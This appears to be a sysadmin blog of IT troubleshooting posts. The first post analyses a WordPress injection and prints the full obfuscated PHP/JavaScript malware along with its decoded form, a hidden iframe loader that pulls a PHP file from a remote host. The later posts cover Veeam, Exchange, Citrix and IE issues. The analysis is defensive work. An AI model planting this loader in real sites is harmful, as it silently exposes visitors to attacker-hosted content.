WordPress Hack

Recently a customer’s site was hacked through an out-of-date plugin. The hack was pretty cool and took me a few hours to decipher.

The hack entailed injecting the following PHP code into the header of every file containing the body tag:

<?php#a9a007#                                                                                                                                                                                                                                                          if(empty($rixmc)) {$rixmc = "<script type=\"text/javascript\" language=\"javascript\">nvbbm=\"fr\"+\"omCh\"+\"ar\"+\"Co\"+\"de\";if(document.querySelector)wtesq=4;iymigs=(\"5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,9f,aa,a5,aa,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,9f,aa,a5,aa,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,9f,aa,a5,aa,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b5,b5,b5,6c,ac,a3,b5,b2,a3,a1,a6,a7,ac,a4,ad,b0,ab,9f,b2,a7,a1,9f,6c,a7,b2,6d,84,a8,94,95,85,a6,a5,b0,6c,ae,a6,ae,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,ae,ad,b1,a7,b2,a7,ad,ac,5e,7b,5e,65,9f,a0,b1,ad,aa,b3,b2,a3,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a1,ad,aa,ad,b0,5e,7b,5e,65,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,a6,a3,a7,a5,a6,b2,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b5,a7,a2,b2,a6,5e,7b,5e,65,77,76,ae,b6,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,aa,a3,a4,b2,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,5e,9f,aa,a5,aa,6c,b1,b2,b7,aa,a3,6c,b2,ad,ae,5e,7b,5e,65,6f,6e,6e,6e,77,76,65,79,4b,48,4b,48,5e,a7,a4,5e,66,5f,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,67,5e,b9,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,b5,b0,a7,b2,a3,66,65,7a,ae,5e,a7,a2,7b,9a,65,9f,aa,a5,aa,9a,65,5e,a1,aa,9f,b1,b1,7b,9a,65,9f,aa,a5,aa,6e,77,9a,65,5e,7c,7a,6d,ae,7c,65,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a5,a3,b2,83,aa,a3,ab,a3,ac,b2,80,b7,87,a2,66,65,9f,aa,a5,aa,65,67,6c,9f,ae,ae,a3,ac,a2,81,a6,a7,aa,a2,66,9f,aa,a5,aa,67,79,4b,48,5
e,bb,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,91,a3,b2,81,ad,ad,a9,a7,a3,66,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,6a,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,6a,ac,82,9f,b7,b1,6a,ae,9f,b2,a6,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b2,ad,a2,9f,b7,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,b4,9f,b0,5e,a3,b6,ae,a7,b0,a3,5e,7b,5e,ac,a3,b5,5e,82,9f,b2,a3,66,67,79,4b,48,5e,a7,a4,5e,66,ac,82,9f,b7,b1,7b,7b,ac,b3,aa,aa,5e,ba,ba,5e,ac,82,9f,b7,b1,7b,7b,6e,67,5e,ac,82,9f,b7,b1,7b,6f,79,4b,48,5e,a3,b6,ae,a7,b0,a3,6c,b1,a3,b2,92,a7,ab,a3,66,b2,ad,a2,9f,b7,6c,a5,a3,b2,92,a7,ab,a3,66,67,5e,69,5e,71,74,6e,6e,6e,6e,6e,68,70,72,68,ac,82,9f,b7,b1,67,79,4b,48,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,5e,7b,5e,a1,ad,ad,a9,a7,a3,8c,9f,ab,a3,69,60,7b,60,69,a3,b1,a1,9f,ae,a3,66,a1,ad,ad,a9,a7,a3,94,9f,aa,b3,a3,67,4b,48,5e,69,5e,60,79,a3,b6,ae,a7,b0,a3,b1,7b,60,5e,69,5e,a3,b6,ae,a7,b0,a3,6c,b2,ad,85,8b,92,91,b2,b0,a7,ac,a5,66,67,5e,69,5e,66,66,ae,9f,b2,a6,67,5e,7d,5e,60,79,5e,ae,9f,b2,a6,7b,60,5e,69,5e,ae,9f,b2,a6,5e,78,5e,60,60,67,79,4b,48,bb,4b,48,a4,b3,ac,a1,b2,a7,ad,ac,5e,85,a3,b2,81,ad,ad,a9,a7,a3,66,5e,ac,9f,ab,a3,5e,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b0,b2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,ac,9f,ab,a3,5e,69,5e,60,7b,60,5e,67,79,4b,48,5e,b4,9f,b0,5e,aa,a3,ac,5e,7b,5e,b1,b2,9f,b0,b2,5e,69,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,69,5e,6f,79,4b,48,5e,a7,a4,5e,66,5e,66,5e,5f,b1,b2,9f,b0,b2,5e,67,5e,64,64,4b,48,5e,66,5e,ac,9f,ab,a3,5e,5f,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,6e,6a,5e,ac,9f,ab,a3,6c,aa,a3,ac,a5,b2,a6,5e,67,5e,67,5e,67,4b,48,5e,b9,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,bb,4b,48,5e,a7,a4,5e,66,5e,b1,b2,9f,b0,b2,5e,7b,7b,5e,6b,6f,5e,67,5e,b0,a3,b2,b3,b0,ac,5e,ac,b3,aa,aa,79,4b,48,5e,b4,9f,b0,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,a7,ac,a2,a3,b6,8d,a4,66,5e,60,79,60,6a,5e,aa,a3,ac,5e,67,79,4b,48,5e,a7,a4,5e,66,5e,a3,ac,a2,5e,7b,7b,5e,6b,6f,5e,
67,5e,a3,ac,a2,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,aa,a3,ac,a5,b2,a6,79,4b,48,5e,b0,a3,b2,b3,b0,ac,5e,b3,ac,a3,b1,a1,9f,ae,a3,66,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,ad,ad,a9,a7,a3,6c,b1,b3,a0,b1,b2,b0,a7,ac,a5,66,5e,aa,a3,ac,6a,5e,a3,ac,a2,5e,67,5e,67,79,4b,48,bb,4b,48,a7,a4,5e,66,ac,9f,b4,a7,a5,9f,b2,ad,b0,6c,a1,ad,ad,a9,a7,a3,83,ac,9f,a0,aa,a3,a2,67,4b,48,b9,4b,48,a7,a4,66,85,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,9f,aa,a5,aa,6e,77,66,67,79,4b,48,bb,4b,48,bb\".split(\",\"));lldu=window[\"asdeval\".substr(3)];function kwstn(){uvt=function(){--(crq.body)}()}crq=document;for(atodfh=0;atodfh<iymigs[\"length\"];atodfh+=1){iymigs[atodfh]=-(62)+parseInt(iymigs[atodfh],wtesq*4);}try{kwstn()}catch(hno){kqxto=50-50;}if(!kqxto)lldu(String[nvbbm].apply(String,iymigs));</script>";echo $rixmc;}#/a9a007#?>

This code then creates an iframe which links to another PHP file on a remote host.

As you can see, the code is heavily obfuscated to avoid detection; however, thanks to StopBadware.org, it was logged and alerted on.

The script works by using two tricks:

1) -(62)+parseInt(iymigs[atodfh],wtesq*4). As you can see in the script, wtesq is set to 4, so this becomes -(62)+parseInt(iymigs[atodfh],16). This makes JavaScript parse each of the comma-separated string values as a radix 16 (hex) number and subtract 62 from it. Here’s some PHP to do the same:

<?php

// Paste the hex list from the script here with the commas removed,
// e.g. "5ea4b3ac..." - every two characters are one value.
$str = "%the string with commas removed%";

// Split into two-character hex values
$hex = str_split($str, 2);

foreach ($hex as $value) {
    // Same as the script: parseInt(value, 16) - 62, giving a character code
    echo -(62) + intval($value, 16);
    echo ", ";
}

?>

2) Cleverly hidden: "fr"+"omCh"+"ar"+"Co"+"de" gives you "fromCharCode", so the values produced above can be pasted into this online tool

http://jdstiles.com/java/cct.html

which then gives us the code:

function algl09() {
 var static='ajax';
 var controller='index.php';
 var algl = document.createElement('iframe');
 
 algl.src = 'http://www.newtechinformatica.it/FjVWGhgr.php';
 algl.style.position = 'absolute';
 algl.style.color = '98';
 algl.style.height = '98px';
 algl.style.width = '98px';
 algl.style.left = '100098';
 algl.style.top = '100098';
 
 if (!document.getElementById('algl')) {
 document.write('<p id=\'algl\' class=\'algl09\' ></p>');
 document.getElementById('algl').appendChild(algl);
 }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
 
algl09();
}
}
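The two steps above carried out offline in one script. This is an added example and not code from the original post: it derives the radix and offset from the loader itself (wtesq*4 and -(62)), decodes the array, and pulls out the iframe target. The input is a constructed, shortened copy of the injected block (the array's first values, the src line and a closing brace); the marker name a9a007 comes from the injected code quoted above.

```python
import re

# Constructed sample: the injected wrapper from the post, shortened to the
# array's first 20 values, the line that sets the iframe src, and a closing
# brace. Quotes are escaped as \" exactly as in the infected header.php.
SAMPLE_INJECTED = (
    '<?php#a9a007# if(empty($rixmc)) {$rixmc = "<script type=\\"text/javascript\\">'
    'nvbbm=\\"fr\\"+\\"omCh\\"+\\"ar\\"+\\"Co\\"+\\"de\\";if(document.querySelector)wtesq=4;'
    'iymigs=(\\"5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,9f,aa,a5,aa,6e,77,66,67,5e,b9,4b,48,'
    '5e,9f,aa,a5,aa,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b5,b5,b5,6c,ac,a3,b5,'
    'b2,a3,a1,a6,a7,ac,a4,ad,b0,ab,9f,b2,a7,a1,9f,6c,a7,b2,6d,84,a8,94,95,85,a6,a5,b0,'
    '6c,ae,a6,ae,65,79,4b,48,bb\\".split(\\",\\"));'
    'for(atodfh=0;atodfh<iymigs[\\"length\\"];atodfh+=1)'
    '{iymigs[atodfh]=-(62)+parseInt(iymigs[atodfh],wtesq*4);}'
    '</script>";echo $rixmc;}#/a9a007#?>'
)


def decode_params(src):
    """Recover the radix and offset the loader applies: parseInt(x, wtesq*N) - K."""
    wtesq = int(re.search(r"wtesq=(\d+)", src).group(1))
    mult = int(re.search(r"parseInt\(iymigs\[\w+\],wtesq\*(\d+)\)", src).group(1))
    offset = int(re.search(r"=-\((\d+)\)\+parseInt\(", src).group(1))
    return wtesq * mult, offset


def decode_array(src):
    """Step 1 of the post: parse every comma-separated value in the recovered
    radix, subtract the offset, then map through fromCharCode (chr here)."""
    radix, offset = decode_params(src)
    m = re.search(r'iymigs=\(\\?"([0-9a-fA-F,\s]+)\\?"', src)
    # Whitespace is stripped first so a list wrapped mid-value still decodes
    tokens = [t for t in re.sub(r"\s", "", m.group(1)).split(",") if t]
    return "".join(chr(int(t, radix) - offset) for t in tokens)


def iframe_targets(decoded_js):
    """Every .src = '...' assignment in the decoded dropper: the hosts to block
    and to search the rest of the site for."""
    return re.findall(r"\.src\s*=\s*'([^']+)'", decoded_js)


def is_infected(php_source, marker="a9a007"):
    """Cheap triage check for this injection: the #a9a007# ... #/a9a007#
    comment pair that brackets the injected block in each infected file."""
    return f"#{marker}#" in php_source and f"#/{marker}#" in php_source


if __name__ == "__main__":
    js = decode_array(SAMPLE_INJECTED)
    print(js)
    print("iframe targets:", iframe_targets(js))
```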

To clean up, remove this code from header.php in WordPress and also remove any HTML/PHP files the attacker has created in the root directory.

 


When installing this version it tries to enable EMM.dll, which only works for Outlook 2003. Unregister this file, located in C:\Program Files (x86)\Interwoven\WorkSite\iOutlook, with regsvr32 /u EMM.dll

Instead, register C:\Program Files (x86)\Interwoven\iOutlook\imFileSite.dll with regsvr32 imFileSite.dll

If the add-in is disabled, go to Manage > Disabled Add-Ins, click Go, and then click Enable.


Recently we had an HTML form that took a username and password and passed them through to a Silverlight web app. When trying to log in using Internet Explorer, the form would refresh with no error message and not log the user in. However, the login worked fine internally.

Internet Explorer can detect whether a website is internal from its IP address and automatically puts it in “Compatibility View” through the default Compatibility View settings. As soon as we forced the external IE client to use Compatibility View it worked. We added this meta tag in the IIS settings:

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

(This can also be added directly to the HTML.) It forced compatibility mode for external users as well, with no need to add the site manually.

However, there was still a problem with Internet Explorer 10 not honouring this meta tag.

Briefly, the issue is that ASP.NET does not return Set-Cookie properly when the user agent sent in the HTTP request is IE10. It works in compatibility mode because the user agent is then reported as IE7.

Thanks to http://www.hanselman.com/blog/BugAndFixASPNETFailsToDetectIE10CausingDoPostBackIsUndefinedJavaScriptErrorOrMaintainFF5ScrollbarPosition.aspx

Basically, what we need to do is download and install the relevant Microsoft hotfix:

.NET 4: http://support.microsoft.com/kb/2600088

.NET 2.0: http://support.microsoft.com/kb/2600100 for Win7 SP1/Windows Server 2008 R2 SP1, Windows Vista/Server 2008 and Windows XP/Server 2003; http://support.microsoft.com/kb/2608565 for Win7/Windows Server 2008 R2 RTM

What the fixes do is update the ie.browser and firefox.browser files in \Windows\Microsoft.NET\Framework\<version>\Config\Browsers with new and future-proofed versions of these browser definitions. Nothing else is affected.

From the description on the blog, the patch is very safe to run: its only job is updating several browser-sniffing related files (very small changes).


We use Veeam to back up our servers. Veeam uses snapshots to copy the whole machine, which can then be copied to disk and backed up to tape. Sometimes, due to changes on the servers through the night, the Veeam backup job overruns. When a snapshot is initially created or removed it can put strain on the disks and also take the server offline. So when a job overruns it can take the server down during production hours.

Here is a PowerShell script which runs first thing in the morning so we know via email about any jobs still running and whether we need to warn the business or cancel a backup.

Run this script on the machine with Veeam installed; I recommend installing PowerShell version 3. Replace the %xxx% values with your own!

# Load the Veeam snap-in (asnp is the alias for Add-PSSnapin)
asnp VeeamPSSnapin -ErrorAction SilentlyContinue
# SMTP server used by Send-MailMessage
$PSEmailServer = "%ExchangeServer%"
# Any job whose last state is still "Working" has overrun into the morning
$Activejobs = Get-VBRJob | ?{$_.GetLastState() -eq "Working"}
foreach($job in $Activejobs)
{
    Send-MailMessage -From "%emailfrom@domain.com%" -To "%emailto@domain.com%" -Subject "Veeam Job Still Running" -Body $job.Name
}

 

To turn a PowerShell .ps1 script into a scheduled task, do the following:

Set the program the task runs to C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and add the location of the .ps1 script as the argument of the scheduled task.


Recently we were having issues with the duration of our Veeam backups of SQL databases. Veeam creates a snapshot of a server, which can then be copied to disk or to tape subsequently. The SQL servers were having their indexes fully rebuilt every night.

“If you’re using the FULL recovery model, the entire index rebuild operation is fully logged, which means the transaction log file must be at least as large as the index being rebuilt. It also means the next transaction log backup will essentially contain the entire index.” (per http://sqlmag.com/blog/it-bad-idea-rebuild-all-indexes-every-night)

This ballooned the storage needed on the SAN nightly by more than 1TB, due to the writes to the transaction log and the changes from the initial snapshot, and also slowed down the overall backup process.

A smarter way to index the servers each night is to analyse which indexes are fragmented and only reindex those.

Details can be found here: http://blogs.technet.com/b/sql_server_isv/archive/2010/10/18/index-fragmentation-if-it-isn-t-broke-don-t-fix-it.aspx

Indexing tasks and scripts can be found here: http://technet.microsoft.com/en-us/library/ms189858.aspx

 

 


We had a recent issue with a new BlackBerry Enterprise Server showing the following error in the Event Viewer:

SRP connection down, ignore sending packets

The first thing to test is the SRP connection using BlackBerry’s tool BBSRPtest.exe. This is now found in the install files from the BlackBerry setup (so don’t remove them!).

Running this produced the following error:

Registry key HKEY_LOCAL_MACHINE\Software\Research In Motion\BlackBerryRouter is missing, trying HKEY_LOCAL_MACHINE\Software\Research In Motion\BlackBerry Enterprise Server\Dispatcher
Registry key HKEY_LOCAL_MACHINE\Software\Research In Motion\BlackBerry Enterprise Server\Dispatcher is missing

 

The new version of this tool needs arguments on the command line, e.g.

BBSRPtest.exe -host au.srp.blackberry.com 3101 (or your own BlackBerry SRP host from the lookup below)

https://www.blackberry.com/SRPAddressLookup/


After rolling out Citrix Receiver version 4 on some new IBM machines (M series) it downgraded the milliamp value of the generic USB hub from the standard 500mA to 100mA.

There is a registry value to force this back up to 100mA, which is located in

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB\<Hardware ID of USB hub>\Parameters

(Find the hardware ID of the USB hub from its Hardware IDs in Device Manager.)

"ForcePortPower" DWORD: 500

Unplug and replug the device.

However, this did not work for us. The issue seems to be CitrixReceiver.exe installing USB drivers on some machines; these drivers are not needed for XenApp (only for XenDesktop).

To install Citrix Receiver without the USB drivers you can run it with the following command:

CitrixReceiver.exe /includeSSON ADDLOCAL=ICA_Client,ReceiverInside,SSON,AM,SELFSERVICE,DesktopViewer,Flash

 

 


When trying to produce the list below, the results displayed fine in the PowerShell window; however, when I tried to export to CSV I got this value:

System.Collections.ObjectModel.Collection’1[Micorosoft.Exchange.Management.MapiTasks.FolderAccessRight]

Following a user who had the same error (reference below), I replaced AccessRights with

@{Name='AccessRights';Expression={[string]::join(";", ($_.AccessRights))}}

Make sure it only has one square bracket though!

Reference: http://www.experts-exchange.com/Programming/Languages/Scripting/Powershell/Q_27099740.html

 


Modified from the trackback URL, this goes through all mailboxes on the Exchange server and exports their mailbox access permissions to CSV files inside C:\Export\, along with any extra folder permissions that have been assigned on individual folders:

(A blank folder name means mailbox-level access.)

 

$Mailboxes = Get-Mailbox -ResultSize Unlimited

ForEach ($Mailbox in $Mailboxes) {

    $MBXFolders = @()
    $MBXFoldersCorr = New-Object System.Collections.ArrayList
    $Permissions = @()
    $MBX_tocheck = "$Mailbox"
    # Every folder path in the mailbox
    $MBXFolders = Get-MailboxFolderStatistics $MBX_tocheck | Select FolderPath

    # Mailbox-level permissions: explicit (not inherited) and not the owner itself
    $Permissions += Get-MailboxPermission -Identity "$Mailbox" |
        Where {$_.User.ToString() -ne "NT AUTHORITY\SELF" -and $_.IsInherited -eq $false} |
        Select User,@{Name='AccessRights';Expression={[string]::join(', ', $_.AccessRights)}}

    # Get-MailboxFolderPermission expects backslashes in the folder path
    foreach ($item in $MBXFolders) {
        $temp = $item.FolderPath
        $temp = $temp.Replace("/","\")
        $MBXFoldersCorr.Add($temp) | Out-Null
    }

    # Folder-level permissions, skipping folders that cannot be queried
    foreach ($item in $MBXFoldersCorr) {
        Try {
            $MailboxFolder = $MBX_tocheck + ":" + $item
            $Permissions += $(Get-MailboxFolderPermission $MailboxFolder -ErrorAction Stop |
                Select-Object FolderName,User,AccessRights |
                Where {($_.AccessRights -notcontains "None")})
        } Catch {
            Continue
        }
    }

    # AccessRights is a collection, so join it into one string for the CSV
    $Permissions | Select FolderName,User,@{Name='AccessRights';Expression={[string]::join(";", ($_.AccessRights))}} |
        Export-Csv -Path "C:\Export\$MBX_tocheck.csv"
}

 

Get a list of Full Access mailbox permissions:

Get-Mailbox | Get-MailboxPermission | where { ($_.AccessRights -eq "FullAccess") -and ($_.IsInherited -eq $false) -and -not ($_.User -like "NT AUTHORITY\SELF") } | ft @{Name="Identity";expression={($_.Identity -split "/")[-1]}}, User -AutoSize

For Office 365:

$Mailboxes = Get-Mailbox -ResultSize Unlimited
 
ForEach ($Mailbox in $Mailboxes) {
 
Get-MailboxFolderPermission -Identity $Mailbox.Name | Where AccessRights -ne "None" | FL
 
}


Get all current mailbox forwards:

Get-Mailbox -ResultSize Unlimited | Select DisplayName,ForwardingAddress | Where {$_.ForwardingAddress -ne $null}

A cool feature to make this better would be to email this report out to each user so they can see the permissions on their mailbox and change them themselves or speak to the helpdesk!
